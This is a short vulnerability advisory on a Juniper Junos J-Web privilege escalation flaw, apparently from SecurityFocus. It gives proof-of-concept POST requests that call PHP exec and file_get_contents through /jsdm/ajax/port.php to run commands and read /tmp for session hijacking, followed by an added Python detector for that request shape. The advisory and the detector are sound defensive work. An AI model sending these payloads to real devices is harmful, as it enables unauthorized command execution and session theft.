Juniper Junos J-Web Privilege Escalation Vulnerability

The following proof-of-concept code is available:


POST /jsdm/ajax/port.php
rs=exec&rsargs[]=echo "hello"

Read /tmp and hijack a session
POST /jsdm/ajax/port.php
rs=file_get_contents&rsargs[]=/tmp
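
A defensive check for the request shape shown above, added here as an example and not part of the original advisory: it flags POSTs to /jsdm/ajax/port.php whose rs parameter names one of the PHP functions seen in the proof of concept. The sample requests, the get_port_list name and the helper names inspect_request and scan are constructed for illustration.

```python
from urllib.parse import parse_qs

# Endpoint and parameter names (rs, rsargs[]) come from the requests shown above.
ENDPOINT = "/jsdm/ajax/port.php"
# Only the two function names that appear in the advisory; extending this
# set is left to the reader's own review (assumption, not vendor guidance).
FLAGGED_FUNCS = {"exec", "file_get_contents"}


def inspect_request(method, path, body):
    """Return a finding dict if a request matches the PoC shape, else None."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return None
    # parse_qs percent-decodes keys and values, so rsargs%5B%5D is matched too.
    params = parse_qs(body, keep_blank_values=True)
    called = [f.strip().lower() for f in params.get("rs", [])]
    hits = [f for f in called if f in FLAGGED_FUNCS]
    if not hits:
        return None
    return {"function": hits[0], "args": params.get("rsargs[]", [])}


def scan(requests):
    """Run inspect_request over (method, path, body) tuples; keep the findings."""
    findings = []
    for method, path, body in requests:
        finding = inspect_request(method, path, body)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample traffic (not captured from a real device).
SAMPLE_REQUESTS = [
    ("POST", "/jsdm/ajax/port.php", 'rs=exec&rsargs[]=echo "hello"'),
    ("POST", "/jsdm/ajax/port.php", "rs=file_get_contents&rsargs%5B%5D=%2Ftmp"),
    # Hypothetical benign function name, used only as a negative case.
    ("POST", "/jsdm/ajax/port.php", "rs=get_port_list&rsargs[]=ge-0/0/0"),
    ("GET", "/index.php", ""),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print("flagged:", finding["function"], finding["args"])
```

This needs request bodies, so it fits a reverse proxy, WAF log, or packet capture, not a plain access log.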


 

Copyright 2010, SecurityFocus